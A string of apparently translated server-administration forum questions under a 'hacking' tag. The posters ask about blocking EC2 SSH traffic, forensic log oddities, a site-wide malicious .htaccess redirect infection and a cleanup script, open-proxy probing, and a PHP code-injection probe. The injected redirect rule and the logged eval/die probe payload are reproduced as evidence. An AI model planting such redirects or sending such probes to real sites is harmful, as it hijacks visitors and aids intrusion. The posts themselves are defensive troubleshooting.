标签: hacking

我想设置一个规则来阻止来自 EC2 的 ssh 请求，因为我已经看到来自那里的大量基于 ssh 的攻击，并且想知道是否有人知道他们的 IP 范围是什么。

编辑：感谢您的回答，我继续执行以下 iptables 规则。我暂时忽略所有流量。记录它只是为了查看规则是否有效以及有关 EC2 发送了多少垃圾的统计信息；)

#EC2 Blacklist
$IPTBLS -A INPUT -s 67.202.0.0/18 -j LOG --log-prefix "<firewall> EC2 traffic "
$IPTBLS -A INPUT -s 67.202.0.0/18 -j DROP 
$IPTBLS -A INPUT -s 72.44.32.0/19 -j LOG --log-prefix "<firewall> EC2 traffic "
$IPTBLS -A INPUT -s 72.44.32.0/19 -j DROP 
$IPTBLS -A INPUT -s 75.101.128.0/17 -j LOG --log-prefix "<firewall> EC2 traffic 
"
$IPTBLS -A INPUT -s 75.101.128.0/17 -j DROP 
$IPTBLS -A INPUT -s 174.129.0.0/16 -j LOG …

在北美或其他地方，是否有服务器管理员对让服务器易受攻击负责的先例？

例如，如果 IIS 中存在已知漏洞——Microsoft 为其发布了补丁，并且出于 X 原因，您没有将其应用到您的服务器上，您的站点就会受到黑客的攻击，结果您最终会用恶意软件感染您的访问者最终可能造成经济损失。你或你可以承担责任吗？

这是主观的，显然不是我做的;) 只是好奇。

我在我的 apache 访问日志中找到了这个

access.log:555.555.555.555 - - [05/May/2011:12:12:21 -0400] "GET /somedir/ HTTP/1.1" 403 291 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0"
access.log:555.555.555.555 - - [05/May/2011:12:12:29 -0400] "GET /somedir/ HTTP/1.1" 200 7629 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0"

所以 /somedir/ 有 .htaccess 文件，看起来像

Order Deny,Allow
Deny from all
Allow from 333.333.333.333
Allow from 444.444.444.444

htaccess 未在时间范围内修改（12:12:21 和 12:12:29 之间的 8 秒）

任何想法如何可能达到 403 Forbidden 然后在 8 秒后达到 200 OK；我很困惑

我有一个客户让我尝试分析一个网站的漏洞。

发生的事情是，每个周末左右，数据库中一张表的一条记录的字段每次都会更改为相同的内容。从Jewelry到Jewelery <a href="http://[**REMOVED-FOR-SF**]/viewPress?press_id=407">[**REMOVED-FOR-SF**]</a><a href="http://[**REMOVED-FOR-SF**]/[**REMOVED-FOR-SF**].html">[**REMOVED-FOR-SF**]</a>。它总是相同的记录这一事实让我认为它是某种自动脚本，但如果是，我找不到它。

已完成以下工作：

• 修复 SQL 注入漏洞
• 在 777 个目录中阻止 PHP 执行
• 每次修复后更改数据库密码
• 每次修复后更改 CMS 密码

下一步是什么？

我们经营着一个托管大约 300 个网站的网络服务器群。

昨天早上，一个脚本将 www-data（apache 用户）拥有的 .htaccess 文件放置在大多数（但不是全部）站点的 document_root 下的每个目录中。

.htaccess 文件的内容是这样的：

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR}

谷歌搜索那个 url（这是“防病毒”的 md5 哈希）我发现同样的事情发生在整个互联网上，我正在寻找已经处理过这个问题的人，并确定了漏洞在哪里。

我已经搜索了我们的大部分日志，但还没有找到任何结论。有没有其他人经历过同样的事情，比我在查明漏洞方面做得更进一步？

到目前为止，我们已经确定：

• 这些更改是作为 www-data 进行的，因此 apache 或其插件可能是罪魁祸首
• 所有的更改都是在 15 分钟内完成的，所以它可能是自动化的
• 由于我们的网站具有广泛不同的域名，我认为一个站点上的单个漏洞是有责任的（而不是每个站点上的常见漏洞）
• 如果一个 .htaccess 文件已经存在并且可以被 www-data 写入，那么该脚本是友好的，只需将上述行附加到文件的末尾（使其易于反转）

任何更多提示将不胜感激。

==编辑==

对于那些需要它的人，这里是我用来清理 .htaccess 文件的脚本：

#!/bin/bash
PATT=84f6a4eef61784b33e4acbd32c8fdd72.com
DIR=/mnt
TMP=/tmp/`mktemp "XXXXXX"`
find $DIR -name .htaccess|while read FILE; do
  if ( grep $PATT "$FILE" > /dev/null); then
    if [ `cat "$FILE"|wc -l` -eq …

我有一个非常特殊的案例，我已经研究了好几天。我有一个非常大的 SQL Server 2008 数据库（大约 2 TB），其中包含 500 个文件组来支持非常大的分区表。最近，我们在其中一个驱动器上发生了灾难性故障，丢失了几个文件组，并且数据库无法访问。

我们每天都在进行文件组备份，但由于其他问题，我们丢失了日志和主文件组的最新备份。我们备份了所有数据，但主文件组备份是旧的。

自主文件组备份以来没有架构更改，但 lsn 现在完全不同步，我们无法恢复数据。

我已经尝试了我能想到的所有方法（并且尝试了几乎所有我可以谷歌搜索的技巧和技巧），但我仍然在同一点收到消息说文件组 x 的文件与主文件组不匹配。我现在正在尝试编辑系统表（我们有一个单独的临时环境来执行此操作，因此我们不担心损坏任何生产数据库）。我尝试过更新 sys.sysdbreg、sys.sysbrickfiles 和 sys.sysprufiles 以试图欺骗 SQL 认为所有文件都在线，但是“Select * From OPENROWSET(TABLE DBPROP, 5)”显示的数据库状态与什么不同我在 sys.sysdbreg 中看到。

我现在想我需要以某种方式编辑实际数据文件的标题，以尝试将 lsn 与主文件对齐。

我感谢任何人可以在这里给我的任何帮助，但请不要回复诸如“您不应该编辑 mdf、ndf 文件....”或“请参阅 msdn 文章....”等。这是一个高级的紧急情况，我需要一个真正的黑客，这样我们就可以在这个损坏的数据库中获取数据并导出到一个新的数据库。我知道有一种方法可以做到这一点，但不知道 DBPROP 系统函数的作用（即它是查看系统表还是实际打开文件）使我无法弄清楚如何欺骗 SQL 以允许我读取这些文件。

谢谢你的帮助。

好吧，这令人沮丧，我的网站在过去 3 天内获得了数千次页面浏览/连接，最后我们用完了每月的带宽。我们购买了更多带宽并关闭了站点进行维护。我们检查了日志并找到了一个负责任的 IP 并禁止了它，但是当我们打开该站点时，攻击仍在继续。这次是来自不同国家的多个IP，他们访问了我们网站的不同页面数千次。

我们应该做什么？

编辑 这可能很重要：机器人或黑客或任何似乎坚持一个网页并一遍又一遍地访问它（如我们的论坛会员页面）但当我们限制该页面的权限时，它只会去寻找其他地方。奇怪的。

我在一家拥有偏执客户的小型 IT 公司工作，因此安全性一直是我们的重要考虑因素。过去，我们已经要求两家专门从事该领域的独立公司（Dionach和GSS）进行渗透测试。我们还使用 Nessus 运行了一些自动化渗透测试。

那两位审计师得到了很多内幕消息，几乎一无所获*......

虽然认为我们的系统非常安全让人感觉很舒服（并且在我们的客户执行尽职调查工作时向他们展示这些报告肯定很舒服），但我很难相信我们已经实现了一个完全安全的系统，特别是考虑到我们公司没有安全专家（安全一直是一个问题，我们完全偏执，这有帮助，但仅此而已！）

如果黑客可以入侵那些可能至少雇佣了几个人的唯一任务是确保他们的数据保密的公司，那么他们肯定可以入侵我们的小企业，对吧？

有人有雇佣“道德黑客”的经验吗？如何找到一个？需要多少费用？

*他们给我们的唯一建议是在两台 Windows 服务器上升级我们的远程桌面协议，他们之所以能够访问这些协议，只是因为我们给了他们正确的非标准端口并将他们的 IP 地址列入白名单。

我在 access.log 中遇到了以下条目：

58.218.199.147 - - [05/Jun/2012:12:56:04 +1000] "GET http://proxyproxys.com/ HTTP/1.1" 200 183 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

通常，当我在 access.log 中看到一个完整的 URL 条目时，我认为它是日志垃圾邮件，有人试图让我访问他们的网站。这些条目通常会跟随 404 响应。

上述条目之后是 200 'success' 响应！做一些搜索，当有人试图使用您的服务器作为代理时，似乎会发生这种情况。这让我更加不安 - 特别是因为有问题的 URL 中有代理这个词。

转到站点“proxyproxys.com”（使用 hidemyass.com 来保护我自己的身份），该站点返回的内容似乎是某种“代理法官”

----------------------------------------
HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.8
HTTP_USER_AGENT=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.53 Safari/536.5
HTTP_CONNECTION=close
REMOTE_PORT=56355

REMOTE_HOST=74.63.112.142
REMOTE_ADDR=74.63.112.142
----------------------------------------
CS_ProxyJudge Result=HIGH_ANONYMITY
----------------------------------------

问题：1) 200 成功是否意味着有人能够成功使用我的服务器作为代理？2) 是否有其他方法可以确认我的服务器是否被用作代理 3) 如果有的话，您能否向我推荐文档以帮助“弥合”我的安全漏洞。

谢谢。

我正在使用 Apache 2.4.29 和 PHP 7.0.28 运行 CentOS 7.x VPS，我开始在日志中看到以下内容。我已经从网上的文章中尽可能保护了 php.ini 一段时间了，但我想知道为什么我在执行以下操作时看到 HTTP 状态代码为 200 成功并想知道它在做什么以及如何防止它? 据我所知die()，相当于exit(). 这是已知的较旧的缓冲区溢出漏洞吗？

但最重要的是，它为什么会成功以及它造成了什么损害？

[18/Mar/2018:09:57:21 +0000] "POST /?q=die('z!a'.'x');&w=die('z!a'.'x');&e=die('z!a'.'x');&r=die('z!a'.'x');&t=die('z!a'.'x');&y=die('z!a'.'x');&u=die('z!a'.'x');&i=die('z!a'.'x');&o=die('z!a'.'x');&p=die('z!a'.'x');&a=die('z!a'.'x');&s=die('z!a'.'x');&d=die('z!a'.'x');&f=die('z!a'.'x');&g=die('z!a'.'x');&h=die('z!a'.'x');&j=die('z!a'.'x');&k=die('z!a'.'x');&l=die('z!a'.'x');&z=die('z!a'.'x');&x=die('z!a'.'x');&c=die('z!a'.'x');&v=die('z!a'.'x');&b=die('z!a'.'x');&n=die('z!a'.'x');&m=die('z!a'.'x');&eval=die('z!a'.'x');&enter=die('z!a'.'x'); HTTP/1.1" 200 3564